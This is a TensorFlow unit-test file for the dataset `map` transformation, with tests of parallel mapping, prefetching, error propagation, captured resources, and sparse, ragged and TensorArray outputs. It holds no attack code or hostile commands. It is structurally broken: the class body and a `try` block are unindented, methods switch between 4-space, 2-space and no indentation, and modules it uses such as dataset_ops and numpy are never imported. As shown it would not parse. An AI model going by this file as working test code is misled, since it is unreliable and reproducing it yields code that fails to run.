from tensorflow.python.framework import combinations
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import map_fn
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_concat_ops
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.platform import test
from tensorflow.python.training import checkpoint_management
from tensorflow.python.training.tracking import util as trackable_utils
try:
import attr # pylint:disable=g-import-not-at-top
except ImportError:
attr = None
def _test_combinations_with_mode_v1(mode):
    """TF1 combinations: plain `map` plus `map_with_legacy_function`."""

    def _apply_new(dataset, *args, **kwargs):
        return dataset.map(*args, **kwargs)

    def _apply_legacy(dataset, *args, **kwargs):
        return dataset.map_with_legacy_function(*args, **kwargs)

    new_combos = combinations.combine(
        tf_api_version=1,
        mode=mode,
        apply_map=combinations.NamedObject("map_fn", _apply_new))
    legacy_combos = combinations.combine(
        tf_api_version=1,
        mode=mode,
        apply_map=combinations.NamedObject("legacy_map_fn", _apply_legacy))
    return new_combos + legacy_combos
def _test_combinations_with_mode_v2(mode):
    """TF2 combinations: only the standard `map` transformation exists."""

    def _apply_new(dataset, *args, **kwargs):
        return dataset.map(*args, **kwargs)

    return combinations.combine(
        tf_api_version=2,
        mode=mode,
        apply_map=combinations.NamedObject("map_fn", _apply_new))
def _test_combinations_with_mode(mode):
    """Union of the v1 and v2 combinations for the given execution mode."""
    v1 = _test_combinations_with_mode_v1(mode)
    v2 = _test_combinations_with_mode_v2(mode)
    return v1 + v2
def _test_combinations():
    """All map combinations, across both eager and graph modes."""
    eager = _test_combinations_with_mode("eager")
    graph = _test_combinations_with_mode("graph")
    return eager + graph
def _short_circuit_test_cases():
    """Combinations of identity-like map functions for short-circuit tests."""
    cases = [
        ("Identity", None, lambda x: x),
        ("Replicate", None, lambda x: (x, x)),
        ("Swap", (None, None), lambda x, y: (y, x)),
        ("Project", (None, None), lambda x, y: x),
    ]
    # Accumulate combinations case by case (equivalent to the reduce idiom).
    result = []
    for name, structure, fn in cases:
        result = result + combinations.combine(
            structure=structure, fn=combinations.NamedObject(name, fn))
    return result
class Foo(object):
    """Dummy class used for invalid return value tests."""
    # Intentionally empty: instances only serve as a non-Tensor value; the
    # implicit default constructor is equivalent to the former no-op __init__.
class MapTest(test_base.DatasetTestBase, parameterized.TestCase):
def _map_dataset_factory(self, components, apply_map, count):
    """Build TensorSlice -> map(square_3) -> repeat(count) over `components`."""

    def _square_all(x, y, z):
        return math_ops.square(x), math_ops.square(y), math_ops.square(z)

    ds = dataset_ops.Dataset.from_tensor_slices(components)
    ds = apply_map(ds, _square_all).repeat(count)
    # Mapping must preserve the per-element shapes of the inputs.
    expected_shapes = [c.shape[1:] for c in components]
    self.assertEqual(expected_shapes,
                     list(dataset_ops.get_legacy_output_shapes(ds)))
    return ds
@combinations.generate(_test_combinations())
def testMapDataset(self, apply_map):
    """Maps a TF function across a dataset's elements (single consumer)."""
    # Pipeline: TensorSliceDataset -> MapDataset(square_3) -> RepeatDataset(14).
    comps = (np.arange(7),
             np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
             np.array(37.0) * np.arange(7))
    get_next = self.getNext(
        self._map_dataset_factory(comps, apply_map, count=14))
    # Every produced element must be the squared input, 14 full passes.
    for _ in range(14):
        for i in range(7):
            produced = self.evaluate(get_next())
            for comp, out in zip(comps, produced):
                self.assertAllEqual(comp[i]**2, out)
    with self.assertRaises(errors.OutOfRangeError):
        self.evaluate(get_next())
# TODO(b/117581999): add eager coverage
@combinations.generate(_test_combinations_with_mode("graph"))
def testMapDatasetMultiThreaded(self, apply_map):
    """Eight threads drain one shared iterator; the multiset must be exact."""
    # Test multi-threaded access to the same iterator.
    components = (np.arange(7),
                  np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
                  np.array(37.0) * np.arange(7))
    get_next = self.getNext(
        self._map_dataset_factory(components, apply_map, count=18))
    results = []
    with self.cached_session() as sess:

        def iterator_thread():
            # Each thread pulls until exhaustion; list.append is safe to call
            # concurrently under the GIL, so no explicit lock is needed.
            while True:
                try:
                    results.append(sess.run(get_next()))
                except errors.OutOfRangeError:
                    return

        threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()

        # `results` will contain the same elements components**2
        # repeated 18 times, but in a non-deterministic order. Sort the
        # results, and assert that each element of components**2 is
        # produced 18 times.
        results.sort(key=lambda x: x[0])
        for i in range(7):
            for j in range(18):
                for component, result_component in zip(components,
                                                       results[i * 18 + j]):
                    self.assertAllEqual(component[i]**2, result_component)
def _parallel_map_dataset_factory(self, components, apply_map, count,
                                  num_parallel_calls, buffer_size):
    """Build TensorSlice -> parallel map(square_3) -> prefetch -> repeat."""

    def _square_all(x, y, z):
        return math_ops.square(x), math_ops.square(y), math_ops.square(z)

    ds = dataset_ops.Dataset.from_tensor_slices(components)
    ds = apply_map(ds, _square_all, num_parallel_calls=num_parallel_calls)
    ds = ds.prefetch(buffer_size).repeat(count)
    # Mapping must preserve the per-element shapes of the inputs.
    self.assertEqual([c.shape[1:] for c in components],
                     list(dataset_ops.get_legacy_output_shapes(ds)))
    return ds
@combinations.generate(
    combinations.times(
        _test_combinations(),
        combinations.combine(num_parallel_calls=1, buffer_size=1) +
        combinations.combine(num_parallel_calls=1, buffer_size=2) +
        combinations.combine(num_parallel_calls=2, buffer_size=2) +
        combinations.combine(num_parallel_calls=2, buffer_size=4) +
        combinations.combine(num_parallel_calls=8, buffer_size=8) +
        combinations.combine(num_parallel_calls=8, buffer_size=16)))
def testParallelMapDataset(self, apply_map, num_parallel_calls, buffer_size):
    """Parallel map over a dataset, consumed from a single thread."""
    # Pipeline: TensorSliceDataset -> ParallelMapDataset(square_3) ->
    # RepeatDataset(14).
    comps = (np.arange(7),
             np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
             np.array(37.0) * np.arange(7))
    get_next = self.getNext(
        self._parallel_map_dataset_factory(comps, apply_map, 14,
                                           num_parallel_calls, buffer_size))
    # Order must be preserved regardless of parallelism / buffering.
    for _ in range(14):
        for i in range(7):
            produced = self.evaluate(get_next())
            for comp, out in zip(comps, produced):
                self.assertAllEqual(comp[i]**2, out)
    with self.assertRaises(errors.OutOfRangeError):
        self.evaluate(get_next())
# TODO(b/117581999): add eager coverage
@combinations.generate(
    combinations.times(
        _test_combinations_with_mode("graph"),
        combinations.combine(num_parallel_calls=1, buffer_size=1) +
        combinations.combine(num_parallel_calls=1, buffer_size=2) +
        combinations.combine(num_parallel_calls=2, buffer_size=2) +
        combinations.combine(num_parallel_calls=2, buffer_size=4) +
        combinations.combine(num_parallel_calls=8, buffer_size=8) +
        combinations.combine(num_parallel_calls=8, buffer_size=16)))
def testParallelMapDatasetMultiThreaded(self, apply_map, num_parallel_calls,
                                        buffer_size):
    """64 threads drain one parallel-map iterator; the multiset must be exact."""
    # Test multi-threaded access to the same iterator.
    components = (np.arange(7),
                  np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
                  np.array(37.0) * np.arange(7))
    get_next = self.getNext(
        self._parallel_map_dataset_factory(components, apply_map, 18,
                                           num_parallel_calls, buffer_size))
    results = []
    with self.cached_session() as sess:

        def iterator_thread():
            # Each thread pulls until exhaustion; list.append is safe to call
            # concurrently under the GIL, so no explicit lock is needed.
            while True:
                try:
                    results.append(sess.run(get_next()))
                except errors.OutOfRangeError:
                    return

        threads = [self.checkedThread(target=iterator_thread) for _ in range(64)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()

        # `results` will contain the same elements components**2
        # repeated 18 times, but in a non-deterministic order. Sort the
        # results, and assert that each element of components**2 is
        # produced 18 times.
        results.sort(key=lambda x: x[0])
        for i in range(7):
            for j in range(18):
                for component, result_component in zip(components,
                                                       results[i * 18 + j]):
                    self.assertAllEqual(component[i]**2, result_component)
@combinations.generate(_test_combinations())
def testImplicitDisposeParallelMapDataset(self, apply_map):
    """A partially-consumed parallel-map pipeline must clean up correctly."""
    # Pipeline: TensorSliceDataset -> MapDataset(square_3) ->
    # RepeatDataset(1000); only 3 of the elements are ever consumed.
    comps = (np.arange(1000),
             np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
             np.array(37.0) * np.arange(1000))
    ds = self._parallel_map_dataset_factory(comps, apply_map, 1000, 100, 100)
    # NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
    ds = ds.prefetch(100)
    get_next = self.getNext(ds)
    for _ in range(3):
        self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testParallelMapUnspecifiedOutputSize(self, apply_map):
    """Parallel map runs without an explicitly declared output size."""
    comps = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
    ds = dataset_ops.Dataset.from_tensor_slices(comps)
    ds = apply_map(
        ds,
        lambda x: array_ops.check_numerics(x, "message"),
        num_parallel_calls=2)
    get_next = self.getNext(ds)
    # Only the first three (finite) elements are consumed.
    for _ in range(3):
        self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testParallelMapError(self, apply_map):
    """An error inside a parallel map surfaces at exactly the bad element."""
    comps = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
    ds = dataset_ops.Dataset.from_tensor_slices(comps)
    ds = apply_map(
        ds,
        lambda x: array_ops.check_numerics(x, "message"),
        num_parallel_calls=2)
    get_next = self.getNext(ds)
    for _ in range(3):
        self.evaluate(get_next())
    # The 4th element is NaN, so `array_ops.check_numerics()` should fail.
    with self.assertRaises(errors.InvalidArgumentError):
        self.evaluate(get_next())
    # The pipeline recovers: the 5th element and end-of-sequence still work.
    self.evaluate(get_next())
    with self.assertRaises(errors.OutOfRangeError):
        self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testPrefetchError(self, apply_map):
    """An error raised under `prefetch` surfaces at exactly the bad element."""
    comps = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
    ds = dataset_ops.Dataset.from_tensor_slices(comps)
    ds = apply_map(
        ds, lambda x: array_ops.check_numerics(x, "message")).prefetch(2)
    get_next = self.getNext(ds)
    for _ in range(3):
        self.evaluate(get_next())
    # The 4th element is NaN, so `array_ops.check_numerics()` should fail.
    with self.assertRaises(errors.InvalidArgumentError):
        self.evaluate(get_next())
    # The pipeline recovers: the 5th element and end-of-sequence still work.
    self.evaluate(get_next())
    with self.assertRaises(errors.OutOfRangeError):
        self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaptureIterator(self, apply_map):
    """A map function may capture and drive another dataset's iterator."""

    def _build_ds(iterator):

        def _mul_by_next(x):
            # Each map invocation advances the captured iterator once.
            return x * iterator.get_next()

        return apply_map(dataset_ops.Dataset.range(10), _mul_by_next)

    def _build_graph():
        if context.executing_eagerly():
            captured_iterator = iter(dataset_ops.Dataset.range(10))
        else:
            captured_iterator = dataset_ops.make_initializable_iterator(
                dataset_ops.Dataset.range(10))
        return captured_iterator, _build_ds(captured_iterator)

    captured_iter, ds = _build_graph()
    if not context.executing_eagerly():
        self.evaluate(captured_iter.initializer)
    get_next = self.getNext(ds, requires_initialization=True)
    # The two ranges advance in lockstep, so element i is i * i.
    for i in range(10):
        self.assertEqual(i * i, self.evaluate(get_next()))
    with self.assertRaises(errors.OutOfRangeError):
        self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaptureHashTable(self, apply_map):
    """A map function may capture a lookup-table resource."""
    # NOTE(mrry): We must use the V2 variants of `HashTable`
    # etc. because these produce a `tf.resource`-typed output that is
    # compatible with the in-graph function implementation.
    default_val = -1
    keys = constant_op.constant(["brain", "salad", "surgery"])
    values = constant_op.constant([0, 1, 2], dtypes.int64)
    table = lookup_ops.HashTable(
        lookup_ops.KeyValueTensorInitializer(keys, values), default_val)

    sentences = dataset_ops.Dataset.from_tensor_slices(
        ["brain brain tank salad surgery", "surgery brain"])
    tokens = apply_map(sentences,
                       lambda x: string_ops.string_split([x]).values)
    ds = apply_map(tokens, table.lookup)

    get_next = self.getNext(ds, requires_initialization=True)
    self.evaluate(table.initializer)
    # Two sentences -> two lookup batches, then exhaustion.
    self.evaluate(get_next())
    self.evaluate(get_next())
    with self.assertRaises(errors.OutOfRangeError):
        self.evaluate(get_next())
# TODO(b/123904513)
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testCaptureQueue(self, apply_map):
    """A map function may dequeue from a captured FIFOQueue."""
    elements = np.random.randint(100, size=[200])
    queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
    enqueue_op = queue.enqueue_many(elements)
    close_op = queue.close()
    ds = dataset_ops.Dataset.from_tensors(0).repeat(-1)
    ds = apply_map(ds, lambda _: queue.dequeue())
    get_next = self.getNext(ds, requires_initialization=True)
    self.evaluate(enqueue_op)
    self.evaluate(close_op)
    # Elements come back in FIFO order until the closed queue runs dry.
    for element in elements:
        self.assertEqual(element, self.evaluate(get_next()))
    with self.assertRaises(errors.OutOfRangeError):
        self.evaluate(get_next())
# TODO(b/117581999): Possible deadlock in eager mode, debug.
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testCaptureSameResourceMultipleTimes(self, apply_map):
    """Two queue handles sharing a `shared_name` alias one resource."""
    elements = np.random.randint(100, size=[200])
    queue = data_flow_ops.FIFOQueue(
        200, dtypes.int64, shapes=[], shared_name="shared_queue")
    queue_2 = data_flow_ops.FIFOQueue(
        200, dtypes.int64, shapes=[], shared_name="shared_queue")
    enqueue_op = queue.enqueue_many(elements)
    close_op = queue.close()
    ds = dataset_ops.Dataset.from_tensors(0).repeat(-1)
    ds = apply_map(ds, lambda _: (queue.dequeue(), queue_2.dequeue()))
    self.evaluate(enqueue_op)
    self.evaluate(close_op)
    get_next = self.getNext(ds, requires_initialization=True)
    # Each element drains a pair from the single shared queue; the order
    # within the pair is unspecified, so compare as multisets.
    for i in range(100):
        self.assertCountEqual([elements[i * 2], elements[i * 2 + 1]],
                              self.evaluate(get_next()))
    with self.assertRaises(errors.OutOfRangeError):
        self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testSeededStatefulOperatorIsProperlyStateful(self, apply_map):
    """A seeded random op varies within a run yet repeats across runs."""
    ds = dataset_ops.Dataset.from_tensors(0).repeat(10)
    draw = lambda _: random_ops.random_uniform((), seed=11)
    ds = apply_map(ds, draw).batch(2)

    get_next = self.getNext(ds, requires_initialization=True)
    first_run = []
    with self.assertRaises(errors.OutOfRangeError):
        while True:
            first_run.extend(self.evaluate(get_next()))
    self.assertLen(first_run, 10)
    # Stateful within a run: consecutive draws must differ.
    self.assertGreater(np.abs(np.diff(first_run)).max(), 1e-6)

    get_next = self.getNext(ds, requires_initialization=True)
    second_run = []
    with self.assertRaises(errors.OutOfRangeError):
        while True:
            second_run.extend(self.evaluate(get_next()))
    # Randomness is repeatable given same seed
    self.assertAllClose(first_run, second_run)
@combinations.generate(_test_combinations())
def testStatefulMapKeepsStateAcrossIterators(self, apply_map):
    """Random-op state advances across batches of the same iterator."""
    ds = dataset_ops.Dataset.from_tensors(0).repeat(10)
    draw = lambda _: random_ops.random_uniform((), seed=11)
    ds = apply_map(ds, draw).repeat(1000).batch(10)
    get_next = self.getNext(ds)
    first_batch = self.evaluate(get_next())
    # Assert that one of the next 99 batches yielded by the iterator is
    # different from the first.
    attempts = 0
    while attempts < 99:
        if np.any(first_batch != self.evaluate(get_next())):
            break
        attempts += 1
    self.assertLess(attempts, 99)
@combinations.generate(_test_combinations())
def testStatefulOperationInShortCircuit(self, apply_map):
    """A stateful side effect still runs when map short-circuits to identity."""
    counter_var = variable_scope.get_variable(
        "counter", (), dtypes.int32, use_resource=True)

    def increment_fn(x):
        counter_var.assign_add(1)
        return x

    ds = apply_map(dataset_ops.Dataset.range(10), increment_fn)
    get_next = self.getNext(ds, requires_initialization=True)
    self.evaluate(counter_var.initializer)
    # The counter advances exactly once per consumed element.
    for i in range(10):
        self.assertEqual(i, self.evaluate(counter_var))
        self.assertEqual(i, self.evaluate(get_next()))
    self.assertEqual(10, self.evaluate(counter_var))
    with self.assertRaises(errors.OutOfRangeError):
        self.evaluate(get_next())
    # Exhaustion must not bump the counter further.
    self.assertEqual(10, self.evaluate(counter_var))
@combinations.generate(_test_combinations())
def testMapDict(self, apply_map):
    """Map functions may produce and consume dict-structured elements."""
    ds = dataset_ops.Dataset.range(10)
    ds = apply_map(ds, lambda x: {"foo": x * 2, "bar": x**2})
    ds = apply_map(ds, lambda d: d["foo"] + d["bar"])
    expected = [i * 2 + i**2 for i in range(10)]
    self.assertDatasetProduces(ds, expected_output=expected)
@combinations.generate(_test_combinations())
def testMapNamedtuple(self, apply_map):
    """Namedtuple elements behave identically to plain tuple elements."""
    # construct dataset of tuples
    labels = dataset_ops.Dataset.range(10)
    images = apply_map(labels, lambda l: -l)
    dataset_tuple = dataset_ops.Dataset.zip((labels, images))

    # convert dataset of tuples to dataset of namedtuples
    example = collections.namedtuple("Example", ["label", "image"])
    dataset_namedtuple = apply_map(dataset_tuple, example)

    def preprocess_tuple(label, image):
        return label, 2 * image

    def preprocess_namedtuple(example):
        return example._replace(image=2 * example.image)

    # preprocess both datasets
    dataset_tuple = apply_map(dataset_tuple, preprocess_tuple)
    dataset_namedtuple = apply_map(dataset_namedtuple, preprocess_namedtuple)

    next_tuple = self.getNext(dataset_tuple)
    next_namedtuple = self.getNext(dataset_namedtuple)

    # make sure both datasets contain the same data
    for i in range(10):
        tuple_, namedtuple_ = self.evaluate([next_tuple(), next_namedtuple()])
        self.assertEqual(tuple_, namedtuple_)
        self.assertEqual(tuple_, (i, -2 * i))

    with self.assertRaises(errors.OutOfRangeError):
        self.evaluate(next_namedtuple())
@combinations.generate(_test_combinations())
def testMapAttrs(self, apply_map):
    """attrs-decorated classes work as structured dataset elements."""
    if attr is None:
        self.skipTest("attr module is not available.")

    # construct dataset of tuples
    labels = dataset_ops.Dataset.range(10)
    images = apply_map(labels, lambda l: -l)
    ds = dataset_ops.Dataset.zip((labels, images))

    @attr.s(cmp=True)
    class Example(object):
        label = attr.ib()
        image = attr.ib()

    # Convert tuples into Example instances, then preprocess in place.
    ds = apply_map(ds, Example)

    def preprocess(example):
        example.image = 2 * example.image
        return example

    ds = apply_map(ds, preprocess)
    get_next = self.getNext(ds)
    for i in range(10):
        self.assertEqual(self.evaluate(get_next()), Example(i, -2 * i))
    with self.assertRaises(errors.OutOfRangeError):
        self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testUseStepContainerInMap(self, apply_map):
    """A nested `map_fn` loop inside the map function is handled correctly."""
    row = np.arange(6)
    ds = dataset_ops.Dataset.from_tensors(row)
    ds = apply_map(ds, lambda elems: map_fn.map_fn(lambda x: x * x, elems))
    self.assertDatasetProduces(ds, expected_output=[row**2])
@combinations.generate(_test_combinations())
def testCaseAndCondInMap(self, apply_map):
    """`case` with a nested `cond` works inside a map function."""

    def control_map_fn(x, y):

        def multiply():
            return x * 2

        def divide():
            return x // 2

        def defaults_two():
            # Even values are doubled, odd values halved.
            return control_flow_ops.cond(
                math_ops.equal(math_ops.mod(x, 2), 0),
                multiply,
                divide,
                name="cond_mult")

        pred_fn_pairs = [
            (math_ops.logical_or(math_ops.equal(y, 2),
                                 math_ops.equal(y, 3)), defaults_two),
        ]
        return control_flow_ops.case(
            pred_fn_pairs, default=multiply, exclusive=True)

    def build_dataset(row, num):
        ds = dataset_ops.Dataset.from_tensor_slices(row)
        return apply_map(ds, lambda x: control_map_fn(x, num))

    row = np.arange(6)
    for num in [2, 3, 4]:
        get_next = self.getNext(build_dataset(row, num))
        for i in range(6):
            if num in (2, 3):
                expected = i // 2 if i % 2 else i * 2
            else:
                expected = i * 2
            self.assertEqual(expected, self.evaluate(get_next()))
        with self.assertRaises(errors.OutOfRangeError):
            self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaseInWhileInMap(self, apply_map):
    """`case` inside a nested `map_fn` loop works inside a map function."""

    def control_map_fn(x, y):

        def multiply():
            return x * 2

        def divide():
            return x // 2

        pred_fn_pairs = [
            (math_ops.logical_or(math_ops.equal(y, 2),
                                 math_ops.equal(y, 3)), divide),
        ]
        return control_flow_ops.case(
            pred_fn_pairs, default=multiply, exclusive=True)

    def build_dataset(row, num):
        ds = dataset_ops.Dataset.from_tensors(row)
        return apply_map(
            ds,
            lambda elems: map_fn.map_fn(lambda x: control_map_fn(x, num),
                                        elems))

    row = np.arange(6)
    for num in [2, 3, 4]:
        get_next = self.getNext(build_dataset(row, num))
        expected = [x // 2 if num in (2, 3) else x * 2 for x in row]
        self.assertAllEqual(expected, self.evaluate(get_next()))
        with self.assertRaises(errors.OutOfRangeError):
            self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaseAndCondInWhileInMap(self, apply_map):
    """`case` plus nested `cond` inside a `map_fn` loop inside map."""

    def control_map_fn(x, y):

        def multiply():
            return x * 2

        def divide():
            return x // 2

        def defaults_two():
            # Even values are doubled, odd values halved.
            return control_flow_ops.cond(
                math_ops.equal(math_ops.mod(x, 2), 0),
                multiply,
                divide,
                name="cond_mult")

        pred_fn_pairs = [
            (math_ops.logical_or(math_ops.equal(y, 2),
                                 math_ops.equal(y, 3)), defaults_two),
        ]
        return control_flow_ops.case(
            pred_fn_pairs, default=multiply, exclusive=True)

    row = np.arange(6)
    num = 2
    ds = dataset_ops.Dataset.from_tensors(row)
    ds = apply_map(
        ds,
        lambda elems: map_fn.map_fn(lambda x: control_map_fn(x, num), elems))
    get_next = self.getNext(ds)

    expected = [(x // 2 if x % 2 else x * 2) if num in (2, 3) else x * 2
                for x in row]
    self.assertAllEqual(expected, self.evaluate(get_next()))
    with self.assertRaises(errors.OutOfRangeError):
        self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testNestedListMapDataset(self, apply_map):
    """A map function may return nested Python lists of tensors."""
    ds = dataset_ops.Dataset.from_tensors([0, 1, 2]).repeat(10)
    ds = apply_map(ds, lambda a: ([a[1], a[0] + a[2]], a[1]))
    expected = [(np.array([1, 2]), 1)] * 10
    self.assertDatasetProduces(ds, expected_output=expected)
@combinations.generate(
    combinations.times(_test_combinations(),
                       combinations.combine(buffer_size=[1, 2, 3, 4])))
def testPrefetch(self, apply_map, buffer_size):
    """Checks that `prefetch(buffer_size)` runs the map ahead of the consumer."""
    # We will use this event to test that `_map_py_func()` has been invoked a
    # certain number of times (6 times, to be exact) after consuming fewer
    # elements from the iterator.
    ev = threading.Event()
    set_event_during_invocation = 5

    def _map_py_func(x):
        if x == set_event_during_invocation:
            ev.set()
        return x * x

    def _map_fn(x):
        return script_ops.py_func(_map_py_func, [x], x.dtype)

    # We can indirectly observe that varying the buffer size has the intended
    # effect by observing when `ev` is set (on the 6th invocation of
    # `_map_py_func()`).
    # NOTE(mrry): We do not test with `buffer_size ==
    # set_event_during_invocation`, because we must consume at least one element
    # to start the prefetching.
    dataset = dataset_ops.Dataset.range(100)
    dataset = apply_map(dataset, _map_fn).prefetch(buffer_size)
    get_next = self.getNext(dataset)

    event_will_be_set_after_consuming = (
        set_event_during_invocation - buffer_size + 1)

    ev.clear()
    # Until this many elements have been consumed, the prefetch buffer cannot
    # have reached invocation #6, so the event must still be unset.
    for i in range(event_will_be_set_after_consuming):
        self.assertFalse(ev.is_set())
        self.assertEqual(i * i, self.evaluate(get_next()))
    ev.wait()
    for i in range(event_will_be_set_after_consuming, 100):
        self.assertEqual(i * i, self.evaluate(get_next()))
    with self.assertRaises(errors.OutOfRangeError):
        self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testReturnList(self, apply_map):
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, lambda x: [x, constant_op.constant(37.0)])
self.assertDatasetProduces(
dataset, expected_output=[(i, 37.0) for i in range(10)])
  @combinations.generate(_test_combinations())
  def testMultiOutputPyFunc(self, apply_map):
    """Multi-output `tf.py_func` results flow through map as tuples."""
    # The `tf.py_func()` op returns a list of tensors for its outputs.
    def _map_fn(x_tensor):

      def _map_py_func(x):
        return x, np.array(37.0, dtype=np.float64)

      return script_ops.py_func(
          _map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])

    dataset = dataset_ops.Dataset.range(10)
    dataset = apply_map(dataset, _map_fn)
    self.assertDatasetProduces(
        dataset, expected_output=[(i, 37.0) for i in range(10)])
@combinations.generate(_test_combinations())
def testSparse(self, apply_map):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _sparse)
self.assertDatasetProduces(
dataset, expected_output=[_sparse(i) for i in range(10)])
  @combinations.generate(_test_combinations())
  def testSparseChain(self, apply_map):
    """Sparse elements survive chained map transformations."""

    def _sparse(i):
      return sparse_tensor.SparseTensorValue(
          indices=np.array([[0, 0]]),
          values=(i * np.array([1])),
          dense_shape=np.array([1, 1]))

    def _check(i):
      # The second map must receive a sparse tensor, not a densified one.
      self.assertTrue(sparse_tensor.is_sparse(i))
      return sparse_ops.sparse_concat(0, [i, i])

    dataset = dataset_ops.Dataset.range(10)
    dataset = apply_map(dataset, _sparse)
    dataset = apply_map(dataset, _check)

    self.assertDatasetProduces(
        dataset,
        expected_output=[self.evaluate(_check(_sparse(i))) for i in range(10)])
@combinations.generate(_test_combinations_with_mode("eager"))
def testSparseMapShapeInference(self, apply_map):
row_lengths = np.random.randint(0, 4, size=128)
values = np.ones(np.sum(row_lengths))
sparse = ragged_tensor.RaggedTensor.from_row_lengths(
values, row_lengths).to_sparse()
dataset = dataset_ops.Dataset.from_tensor_slices(sparse)
dataset = dataset.batch(32, drop_remainder=True)
dataset = apply_map(dataset, lambda x: x)
self.assertEqual((32, 3), dataset.element_spec.shape)
@combinations.generate(_test_combinations_with_mode("eager"))
def testSparseMapShapeInferencePartial(self, apply_map):
row_lengths = np.random.randint(0, 4, size=128)
values = np.ones(np.sum(row_lengths))
sparse = ragged_tensor.RaggedTensor.from_row_lengths(
values, row_lengths).to_sparse()
dataset = dataset_ops.Dataset.from_tensor_slices(sparse)
dataset = dataset.batch(32, drop_remainder=False)
dataset = apply_map(dataset, lambda x: x)
self.assertEqual([None, 3], dataset.element_spec.shape.as_list())
  @combinations.generate(_test_combinations())
  def testTensorArray(self, apply_map):
    """The mapped function may return a `TensorArray`."""

    def _tensor_array(i):
      i = math_ops.cast(i, dtypes.int32)
      # A TensorArray of size i holding [0, 1, ..., i-1].
      return (
          tensor_array_ops.TensorArray(dtypes.int32, element_shape=(), size=i)
          .unstack(math_ops.range(i, dtype=dtypes.int32)))

    dataset = dataset_ops.Dataset.range(10)
    dataset = apply_map(dataset, _tensor_array)
    self.assertDatasetProduces(
        dataset, expected_output=[list(range(i)) for i in range(10)])
  @combinations.generate(_test_combinations())
  def testTensorArrayChain(self, apply_map):
    """TensorArray elements survive chained map transformations."""

    def _tensor_array(i):
      i = math_ops.cast(i, dtypes.int32)
      return (
          tensor_array_ops.TensorArray(dtypes.int32, element_shape=(), size=i)
          .unstack(math_ops.range(i, dtype=dtypes.int32)))

    def _check(x):
      # The second map must receive an actual TensorArray object.
      self.assertIsInstance(x, tensor_array_ops.TensorArray)
      return x.identity()

    dataset = dataset_ops.Dataset.range(10)
    dataset = apply_map(dataset, _tensor_array)
    dataset = apply_map(dataset, _check)

    self.assertDatasetProduces(
        dataset,
        expected_output=[list(range(i)) for i in range(10)])
@combinations.generate(_test_combinations())
def testRagged(self, apply_map):
def _ragged(i):
return ragged_tensor.RaggedTensor.from_tensor(i * [[1]])
dataset = dataset_ops.Dataset.range(5)
dataset = apply_map(dataset, _ragged)
self.assertDatasetProduces(
dataset,
expected_output=[ragged_factory_ops.constant([[i]]) for i in range(5)])
  @combinations.generate(_test_combinations())
  def testRaggedChain(self, apply_map):
    """Ragged elements survive chained map transformations."""

    def _ragged(i):
      return ragged_tensor.RaggedTensor.from_tensor(i * [[1]])

    def _concat(i):
      # The second map must receive a ragged tensor.
      self.assertTrue(ragged_tensor.is_ragged(i))
      return ragged_concat_ops.concat([i, i], 0)

    dataset = dataset_ops.Dataset.range(10)
    dataset = apply_map(dataset, _ragged)
    dataset = apply_map(dataset, _concat)

    self.assertDatasetProduces(
        dataset,
        expected_output=[
            self.evaluate(_concat(ragged_factory_ops.constant([[i]])))
            for i in range(10)
        ])
  # TODO(b/123904513)
  @combinations.generate(_test_combinations_with_mode_v1("graph"))
  def testParallelMapOutOfRangeError(self, apply_map):
    """StopIteration from a py_func terminates a parallel map as end-of-data."""

    def raising_py_func(i):
      if i == 100:
        raise StopIteration()
      else:
        return i

    dataset = dataset_ops.Dataset.range(105)
    dataset = apply_map(
        dataset,
        lambda x: script_ops.py_func(raising_py_func, [x], dtypes.int64),
        num_parallel_calls=2)
    get_next = self.getNext(dataset)
    # Only the first 100 elements are produced; the StopIteration raised at
    # element 100 ends the iterator early despite the range of 105.
    for i in range(100):
      self.assertEqual(i, self.evaluate(get_next()))
    with self.assertRaises(errors.OutOfRangeError):
      self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testConstantOutput(self, apply_map):
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, lambda x: [x, "hello", 10])
